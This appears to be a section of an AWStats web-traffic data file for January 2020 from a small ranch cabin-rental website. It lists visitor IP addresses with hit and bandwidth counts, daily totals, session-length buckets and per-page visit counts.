207.102.138.158 9 24 259994 20200128084840
114.119.144.84 1 1 13640 20200111045714
114.119.149.243 1 1 13640 20200125195030
67.190.120.18 1 1 22952 20200129071533
174.236.4.24 1 1 12026 20200119222055
24.249.102.168 11 54 7359812 20200123084625
34.217.41.226 1 1 22952 20200123114244
34.211.105.135 1 1 22952 20200123134156
159.138.151.243 1 1 11860 20200103042444
159.138.156.12 1 1 13897 20200127062531
188.165.235.173 1 1 22952 20200106031303
34.209.149.74 1 1 22952 20200114090216
66.220.149.46 0 1 3034342 
173.211.78.209 1 1 22952 20200107173302
114.119.144.246 1 1 12863 20200123143014
98.102.192.162 6 6 131582 20200128174848
34.222.183.32 1 1 22952 20200126045223
114.119.135.190 1 1 12026 20200107173805
68.97.78.81 3 20 1650016 20200104150832
174.236.4.5 3 3 36078 20200124082221
107.136.121.124 2 17 2394305 20200124002619
114.119.134.205 0 1 371252 
35.223.233.211 1 1 22695 20200123141202
159.138.151.54 1 1 0 20200114234037
173.252.87.33 0 1 3034342 
69.58.178.28 3 3 66171 20200109130803
114.119.166.175 1 1 21355 20200114214217
174.236.5.183 1 1 12026 20200110055326
166.137.248.117 1 2 14124 20200115182043
71.211.46.31 6 49 4607617 20200103135527
54.200.19.44 1 1 22952 20200111095737
174.236.1.162 1 1 12026 20200103081502
172.58.59.66 1 3 537069 20200117040054
114.119.134.160 1 1 11860 20200127090234
114.119.131.246 1 1 22695 20200124165828
114.119.150.122 0 1 357100 
174.236.0.90 1 1 12026 20200107191519
209.137.246.50 0 2 728352 
114.119.160.36 1 1 13897 20200121080019
96.78.31.195 0 2 716763 
34.210.81.241 1 1 22952 20200124071216
159.65.47.198 6 8 144178 20200101062637
54.202.230.145 1 1 0 20200117041432
159.138.158.4 1 1 13897 20200119120127
3.16.70.180 2 3 23527 20200127232304
104.245.145.6 1 1 22952 20200108164930
172.58.59.85 1 1 348 20200117104913
34.215.210.11 1 1 22952 20200107044647
47.188.67.168 0 1 227 
184.154.139.9 7 25 490232 20200125140332
69.170.211.87 2 10 248760 20200102092441
98.102.75.218 6 41 6452584 20200124134721
34.220.152.240 1 1 22952 20200125060210
114.119.132.253 0 1 371252 
209.64.0.98 4 23 1369201 20200115115029
66.220.149.32 0 1 33130 
114.119.145.169 1 1 21355 20200124125234
68.225.129.167 0 3 414380 
5.255.174.141 1 1 22952 20200124122057
114.119.139.38 1 1 21355 20200128053017
18.184.195.200 1 1 22952 20200102055602
184.154.139.8 4 16 311520 20200122140825
174.96.248.0 4 22 194982 20200126180128
159.138.157.16 1 1 0 20200118002629
185.234.216.20 1 1 22952 20200103102843
54.185.192.105 1 1 22952 20200106074501
40.77.189.94 0 1 12369 
174.236.5.41 1 1 12026 20200120215227
192.99.47.111 6 7 45243 20200112005137
114.119.142.145 1 1 11860 20200129034726
174.236.7.122 1 1 12026 20200127161410
52.40.93.233 1 1 22952 20200126071708
66.254.135.254 12 68 6091990 20200106170438
159.138.159.84 1 1 12199 20200116173438
173.252.127.40 0 1 33130 
72.216.191.240 2 16 206776 20200115231709
54.149.159.229 1 1 22952 20200104084023
104.196.113.244 1 1 22952 20200125224305
184.224.61.64 10 63 6216844 20200111140730
47.88.51.0 1 1 22952 20200118131741
216.176.168.168 1 1 12026 20200101185241
114.119.166.188 1 1 13897 20200116173014
34.231.68.152 1 1 22952 20200117124814
159.138.128.169 1 1 11860 20200123233249
174.236.6.253 1 1 12026 20200126161545
50.86.54.34 6 22 2685661 20200131164506
184.94.240.92 1 1 22952 20200101200755
159.138.152.149 1 1 12026 20200116001600
114.119.138.43 1 1 13897 20200127045621
167.114.252.180 1 1 22952 20200120015209
159.138.159.88 1 1 13640 20200125111226
174.236.4.25 3 3 36078 20200104130338
67.190.40.194 0 1 82180 
174.236.0.181 2 2 24052 20200101145846
174.236.1.209 1 1 12026 20200117215509
188.92.72.129 1 1 22952 20200125081149
151.55.44.38 2 15 1009955 20200107233718
68.97.105.175 4 34 1798527 20200129104733
159.138.156.18 1 1 12199 20200123164703
114.119.145.144 1 1 13640 20200116132921
52.42.153.163 1 1 22952 20200125033656
174.244.49.220 12 45 6470194 20200117102430
114.119.135.191 1 1 13897 20200110220032
89.165.218.82 0 2 67914 
75.163.188.109 2 16 1157437 20200110134907
35.188.159.162 1 1 21072 20200123141203
51.89.117.111 6 6 108630 20200129131748
173.252.95.8 1 1 0 20200116164632
159.138.154.251 1 1 12199 20200109122419
220.135.224.120 1 1 13897 20200105211431
151.138.13.148 15 15 344280 20200130203224
167.114.117.176 6 7 132518 20200105123911
58.30.141.60 1 1 22952 20200102131550
159.138.150.217 1 1 21072 20200115133632
34.209.155.169 1 1 22952 20200110102955
114.119.140.158 1 1 0 20200111052709
113.70.181.129 6 6 110510 20200126161803
174.255.130.67 1 1 13897 20200115121017
205.189.99.4 0 1 371252 
104.197.23.244 1 1 21355 20200123141203
174.246.161.113 0 1 299803 
114.119.137.151 0 1 371252 
67.0.42.0 10 69 9892398 20200118172018
139.180.228.57 1 3 35548 20200101213114
174.236.1.150 1 1 12026 20200112060026
159.138.148.210 1 1 21072 20200129022454
71.34.134.248 6 22 965583 20200124234513
47.222.53.94 0 2 728352 
114.119.131.42 0 1 371252 
128.30.195.57 0 1 1165500 
174.236.5.79 1 1 12026 20200117040809
97.73.244.172 8 57 5999648 20200109214213
198.76.25.229 4 43 5324148 20200121160829
71.211.73.16 0 1 1165500 
174.209.10.7 0 1 10576 
108.205.40.216 10 47 5121398 20200116093503
213.242.18.50 1 1 22952 20200116141503
99.107.131.204 1 1 13897 20200109204600
34.219.129.243 1 1 22952 20200103070142
174.236.2.2 1 1 12026 20200123112110
114.119.163.37 1 1 21072 20200124200731
174.236.1.223 2 2 24052 20200114184849
164.90.40.15 1 2 575 20200101190505
159.138.153.206 1 1 12863 20200120095255
66.220.149.29 0 1 33130 
54.200.92.107 1 1 22952 20200128035909
114.119.167.30 1 1 0 20200127055529
52.88.133.0 1 1 22952 20200125092802
173.44.222.209 6 12 1306489 20200120080157
84.17.47.42 1 1 22952 20200116031820
104.196.165.80 1 1 22952 20200101043926
58.22.64.122 1 1 22952 20200126200605
174.236.8.201 2 2 24052 20200113080223
79.107.80.95 3 3 68856 20200112064849
209.97.145.58 2 3 23527 20200114042053
34.216.139.16 1 1 22952 20200119080825
51.77.129.167 2 3 9789 20200112005321
152.89.128.148 4 4 91808 20200116142844
114.119.151.232 0 1 581597 
35.243.229.195 1 1 22952 20200105054125
67.195.161.155 0 1 345511 
159.138.159.149 1 1 12863 20200121130850
114.119.131.210 1 1 22695 20200107165647
47.24.85.68 1 2 575 20200116230326
174.236.3.250 1 1 12026 20200105130252
73.206.32.100 4 38 3506059 20200116153342
98.180.83.225 12 41 1688566 20200126113055
68.15.204.67 1 6 124223 20200116091551
114.119.160.16 1 1 0 20200111002009
159.138.151.77 1 1 13897 20200108102840
114.119.130.63 1 1 13897 20200128082150
159.65.44.69 6 8 144178 20200117224552
64.57.49.112 14 59 6459295 20200123161101
52.37.99.255 1 1 22952 20200128070739
174.236.4.186 3 3 36078 20200119111036
35.196.115.119 1 1 22952 20200113184002
96.36.176.182 0 1 371252 
209.250.236.123 2 2 45099 20200118080810
54.201.222.171 1 1 22952 20200127030942
184.154.139.7 7 30 587719 20200131141335
114.119.141.251 1 1 13640 20200113201517
18.236.86.205 1 1 22952 20200113051510
114.119.148.37 1 1 0 20200127133424
74.197.69.165 3 6 117380 20200122142616
142.93.176.216 6 8 144178 20200113182831
71.237.43.2 8 45 1584882 20200113145705
67.195.161.202 0 1 371252 
51.89.231.152 6 6 131582 20200122190236
172.58.59.183 7 26 1122157 20200105150838
35.231.188.6 1 1 22952 20200117204150
96.60.234.177 0 1 357100 
114.119.152.243 0 1 349607 
174.236.7.146 1 1 12026 20200109003326
104.131.79.127 6 8 144178 20200126015245
159.138.128.123 1 1 21072 20200108121308
114.119.137.3 1 1 11860 20200111082412
114.119.128.198 1 1 13897 20200125195826
70.163.194.157 9 46 4874462 20200104235111
192.107.135.20 8 58 5799178 20200114214922
174.236.4.32 1 1 12026 20200120185246
159.138.149.246 1 1 13897 20200128114922
94.247.172.129 1 1 22952 20200103102052
159.138.153.198 1 1 13640 20200108061330
114.119.135.71 1 1 13640 20200127064845
172.58.59.250 1 1 348 20200108101957
104.140.83.132 4 7 167504 20200121190814
194.7.35.200 2 2 45904 20200105001514
159.138.128.178 1 1 11860 20200117153127
159.138.155.83 1 1 12863 20200118182120
114.119.139.184 0 1 376595 
159.138.148.51 1 1 12026 20200107034107
34.213.47.114 1 1 22952 20200112101006
174.236.7.252 2 2 24052 20200105180718
98.180.210.110 7 34 1576849 20200122155045
174.236.0.166 1 1 12026 20200123140815
174.236.10.75 1 1 12026 20200122144454
54.189.94.39 1 1 22952 20200105020029
52.6.136.4 1 1 22952 20200106153130
114.119.135.231 1 1 0 20200127054905
173.216.9.186 2 16 1157437 20200117010753
178.162.23.97 1 1 22952 20200130000324
34.219.9.63 1 1 22952 20200101073752
174.236.16.128 1 1 12026 20200122155430
114.119.141.94 1 1 12199 20200111033434
54.187.3.38 1 1 22952 20200126205759
174.236.0.115 2 2 24052 20200106080404
69.171.251.27 0 1 32175 
18.236.247.116 1 1 22952 20200123131830
2.124.22.160 0 1 521642 
104.236.127.161 6 7 131809 20200105091421
114.119.145.47 1 1 0 20200116061108
114.119.167.157 1 1 21355 20200121201522
70.164.58.10 14 58 6662060 20200103123154
166.137.136.60 3 10 619567 20200116105708
50.26.3.107 4 31 2559684 20200126080307
77.236.223.92 1 1 22952 20200108141656
173.252.95.38 0 1 3034342 
184.154.139.6 5 21 419590 20200130140804
198.27.85.233 1 1 22952 20200129153659
172.58.59.163 1 1 348 20200108130506
114.119.129.238 0 1 371252 
174.236.5.147 1 1 12026 20200102155721
159.138.108.122 1 1 12026 20200110220104
208.123.149.87 1 8 5828799 20200114091428
159.138.150.107 0 1 0 
173.219.37.1 5 44 5324496 20200106152254
114.119.132.215 1 1 22695 20200121024807
37.210.77.48 1 1 21355 20200125204039
206.189.156.160 1 1 22952 20200121081109
51.91.218.48 1 6 180669 20200105173100
67.205.176.202 1 1 22952 20200103085213
67.165.84.135 7 25 648783 20200126204314
159.138.128.104 1 1 13897 20200118061024
174.234.144.15 5 16 680891 20200116224125
174.236.2.115 5 32 2550982 20200114000039
159.138.152.167 1 1 0 20200107181215
174.236.6.92 1 1 12026 20200101175154
166.137.136.23 4 13 680316 20200118155109
159.138.148.33 1 4 821659 20200101213602
174.236.9.63 1 1 12026 20200125140207
159.138.148.62 1 1 12026 20200121103301
54.184.84.115 1 1 22952 20200129133712
159.242.254.205 1 6 136592 20200117172306
171.22.76.17 6 12 1306489 20200130022956
174.227.7.239 0 2 728352 
159.138.154.238 1 1 21072 20200110200839
114.119.149.78 0 1 357100 
114.119.165.4 1 1 12026 20200111080019
159.138.159.118 1 1 12863 20200107022849
159.138.155.144 1 1 0 20200123120114
142.93.184.124 6 8 144178 20200130030852
114.119.148.21 1 1 0 20200127230742
114.119.136.112 0 1 357100 
174.236.9.104 1 1 12026 20200115071146
99.12.86.56 2 16 888726 20200105182823
52.42.218.76 1 1 22952 20200118063222
70.94.178.235 0 1 299803 
89.249.67.220 5 5 114760 20200107130218
174.236.7.136 1 1 12026 20200118080918
166.137.143.88 5 16 229409 20200123084712
73.205.1.144 1 1 21072 20200106105130
174.236.6.70 3 3 36078 20200125051121
174.236.2.33 1 1 12026 20200106184355
64.92.54.217 6 35 3045432 20200129212153
114.119.144.177 0 1 376595 
114.119.138.95 0 1 376595 
159.138.155.218 1 1 0 20200125234114
182.74.243.42 1 1 22952 20200109112512
108.70.201.49 5 32 2572058 20200131230428
107.77.68.45 8 66 9316031 20200121132502
114.119.158.198 1 1 13897 20200111063033
167.161.101.241 12 78 9105239 20200121075837
24.76.172.216 0 1 3611257 
123.205.124.227 1 1 13897 20200105093321
174.29.194.88 4 14 314534 20200105150931
35.162.50.0 1 1 22952 20200108124838
97.107.68.51 0 3 991087 
47.185.78.180 0 2 1154245 
74.50.36.197 6 47 3053761 20200101132534
51.68.11.195 1 1 22952 20200120234233
40.77.189.128 1 2 320 20200130135544
52.55.5.16 1 1 22952 20200126154011
114.119.136.202 1 1 22695 20200128215858
216.176.168.18 1 1 12026 20200112142529
114.119.147.62 1 1 13640 20200121024804
174.236.5.28 2 2 24052 20200130043804
206.189.131.213 1 1 22952 20200121135609
54.184.202.12 1 1 22952 20200127092217
114.119.165.155 0 1 357100 
34.218.206.210 1 1 22952 20200106033435
82.27.114.199 0 1 521642 
18.236.222.216 1 1 22952 20200116104911
114.119.143.48 0 1 357100 
198.21.92.5 4 23 420137 20200105112048
99.106.36.126 2 10 206428 20200112104821
114.119.148.101 1 1 13897 20200113125446
159.138.159.209 1 1 12026 20200117112328
114.119.146.197 0 1 376595 
159.138.21.170 4 4 87558 20200103015430
173.252.95.33 0 1 33130 
114.119.137.185 1 1 22695 20200116173016
185.229.144.22 3 3 22952 20200128004323
54.80.150.43 1 1 22952 20200126213119
114.119.144.45 1 1 22695 20200112152001
114.119.155.80 1 1 0 20200111061842
104.245.79.249 4 38 3505055 20200117190500
159.138.156.5 1 1 11860 20200128215600
173.252.87.11 1 1 0 20200128231615
34.222.114.15 1 1 22952 20200102072451
174.209.32.147 2 16 879738 20200113225200
66.220.149.4 0 1 33130 
104.236.70.129 6 8 144178 20200122002514
159.138.155.67 1 1 0 20200129075049
54.190.114.212 1 1 22952 20200110154650
172.58.60.208 1 2 47027 20200120143114
174.236.2.227 1 1 12026 20200123045943
66.69.155.248 0 1 371252 
159.138.151.169 1 1 13897 20200107072945
34.218.210.47 1 1 22952 20200124000036
67.162.129.146 2 10 206428 20200112230934
51.68.152.26 2 2 22952 20200124043652
174.246.195.66 1 2 575 20200101193313
72.217.23.213 0 1 357100 
174.236.5.100 1 1 12026 20200104154851
174.236.11.29 1 1 12026 20200121092036
114.119.144.243 1 1 13640 20200107173242
174.236.2.63 1 1 12026 20200121170949
114.119.149.76 0 1 345511 
174.76.29.65 8 22 1018721 20200117222834
159.138.156.118 0 1 43 
173.252.95.34 0 1 33130 
99.7.241.216 1 1 13897 20200101191240
174.236.8.122 5 5 60130 20200111111655
34.219.87.25 1 1 22952 20200116195040
52.25.112.27 1 1 22952 20200120082356
174.236.5.193 1 1 12026 20200109221557
75.91.249.247 8 54 5790531 20200121082449
174.236.2.223 1 1 12026 20200129175600
114.119.134.241 1 1 13897 20200107165736
40.77.60.251 1 1 21072 20200101104449
114.119.134.32 0 1 357100 
166.137.242.134 8 58 5784929 20200128171532
35.225.152.240 4 21 1195676 20200123141310
40.76.79.103 2 2 45904 20200130082212
107.77.90.29 2 21 369151 20200102212849
114.119.143.190 1 1 13640 20200128233945
174.236.2.164 1 1 12026 20200120140323
34.69.33.136 1 1 22147 20200123141203
75.163.209.83 9 51 6869607 20200126003736
52.32.250.243 1 1 22952 20200110034535
205.235.221.10 4 19 1199918 20200131164958
159.138.150.77 1 1 12026 20200107115610
63.32.112.215 1 2 1413322 20200122003800
159.138.155.129 1 1 13640 20200117073459
174.236.5.218 2 2 24052 20200122044830
184.154.139.5 6 23 454911 20200123140613
54.190.108.73 1 1 21355 20200126042453
159.138.149.67 1 1 13640 20200114234034
114.119.129.115 0 1 376595 
114.119.132.117 1 1 11860 20200107190035
35.161.57.18 1 1 22952 20200108130415
172.58.62.240 3 6 730276 20200112123902
174.236.9.132 1 1 12026 20200118012455
35.225.109.71 1 1 21361 20200123141202
70.57.30.232 5 48 4599924 20200121232928
24.4.118.161 1 2 14124 20200115110100
167.114.90.33 12 67 5482228 20200122073639
174.236.1.23 1 1 12026 20200103161532
73.181.11.174 0 1 371252 
114.119.156.236 1 1 13897 20200128174109
23.22.152.152 1 15 1134485 20200112210838
62.210.83.78 2 2 45904 20200129163242
174.236.7.213 1 1 12026 20200125235129
159.138.152.63 1 1 0 20200108054407
159.138.111.19 1 1 13897 20200120152739
75.109.54.252 0 1 371252 
217.9.49.1 6 51 5613176 20200123043013
114.119.154.146 1 1 12863 20200107170640
67.195.161.40 0 1 357100 
174.236.7.166 1 1 12026 20200122165144
173.235.116.234 8 31 1420291 20200121175700
69.7.127.147 5 24 1392501 20200118195315
54.188.244.151 1 1 22952 20200101035942
174.236.7.165 1 1 12026 20200121194749
174.236.4.6 2 2 24052 20200108044842
172.58.59.17 4 33 4699411 20200108052316
205.185.117.108 1 1 22952 20200119134240
184.166.226.133 14 86 10402993 20200111225912
174.236.6.93 1 1 12026 20200117174741
64.58.50.3 0 2 24738 
54.218.27.201 2 2 22952 20200108143734
159.138.156.151 1 1 13897 20200107211708
193.169.52.39 4 4 91808 20200131024344
114.119.149.7 1 1 21355 20200110220051
159.138.128.143 1 1 12199 20200117191458
159.138.154.255 1 1 13640 20200119035053
213.159.213.236 2 2 0 20200123083244
35.164.195.135 1 1 22952 20200109072720
213.48.83.243 5 43 4385457 20200104092212
67.143.192.12 4 32 2598344 20200122210553
98.17.98.57 1 8 171334 20200122215131
159.138.158.143 1 1 13897 20200121174756
172.245.113.80 6 12 1306489 20200131125632
174.21.65.166 0 5 1436535 
104.245.145.57 1 1 22952 20200120010757
35.245.208.185 1 1 22952 20200103015248
64.246.165.150 1 1 22952 20200116114347
72.179.225.60 2 10 248760 20200110202829
35.196.22.225 1 1 22952 20200121214740
159.138.159.147 1 1 12863 20200109060047
54.245.60.226 1 1 22952 20200114025040
114.119.148.59 1 1 12199 20200108224706
114.119.159.249 1 1 21072 20200110220021
24.177.106.116 0 1 357100 
54.185.137.12 1 1 22952 20200131112527
34.220.64.99 1 1 22952 20200114025041
174.236.1.165 1 1 12026 20200123172903
114.119.151.111 0 1 371252 
173.252.83.3 1 1 0 20200115104832
162.238.52.7 2 15 194407 20200119171004
114.119.151.225 1 1 12863 20200127113955
114.119.148.255 0 1 376595 
67.195.161.248 0 1 357100 
89.40.15.76 1 1 22952 20200127044737
174.50.94.183 7 47 2561277 20200115214730
159.138.159.68 0 1 3611257 
18.237.245.95 1 1 22952 20200125122502
24.15.14.202 14 96 11229588 20200101193835
159.138.128.149 1 1 11860 20200107161847
159.138.156.139 1 1 13897 20200114234036
69.197.70.114 4 27 3673503 20200115172044
159.138.159.53 1 1 12199 20200124181201
159.138.155.142 1 1 12026 20200128024055
174.236.1.10 1 1 12026 20200113202834
159.138.155.23 1 1 12863 20200115133630
67.0.12.245 3 14 404503 20200106193637
174.236.7.56 1 1 12026 20200128053221
35.231.238.97 1 1 22952 20200109121057
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20200101 54 253 27996078 20
20200102 24 125 15512546 12
20200103 33 125 11653701 12
20200104 27 126 11811746 13
20200105 42 116 3736514 19
20200106 38 154 14404097 16
20200107 43 176 19439289 23
20200108 23 61 9163900 18
20200109 30 86 6840189 15
20200110 23 92 5444055 16
20200111 40 178 19004029 17
20200112 29 88 3078168 16
20200113 24 73 3864948 15
20200114 50 254 31481297 17
20200115 28 129 8045599 15
20200116 42 148 14153358 21
20200117 71 292 26063337 21
20200118 48 194 21379624 16
20200119 13 28 395807 11
20200120 51 231 27157009 16
20200121 54 285 31872866 24
20200122 64 267 23075185 18
20200123 66 262 24111921 27
20200124 42 154 15487911 17
20200125 24 35 2406973 20
20200126 59 198 12490949 18
20200127 19 28 2290648 18
20200128 35 97 6840837 22
20200129 49 186 15547899 17
20200130 22 36 1736130 12
20200131 44 195 19714170 9
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 1
5mn-15mn 14
0s-30s 458
2mn-5mn 15
15mn-30mn 7
30s-2mn 32
30mn-1h 4
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 8
/ajax/api/JsonRPC/CustomerAccounts/ 403 139989 25 107
/ 327 6489067 307 220
/cabins.html 182 2533010 111 116
/rates-and-reservations.html 102 1513735 28 27
/story-of-the-ranch.html 81 1348635 34 32
/photos-and-directions.html 61 1056678 12 17
/area-attractions.html 52 875699 11 9
/id2.html 3 56022 3 3
END_SIDER
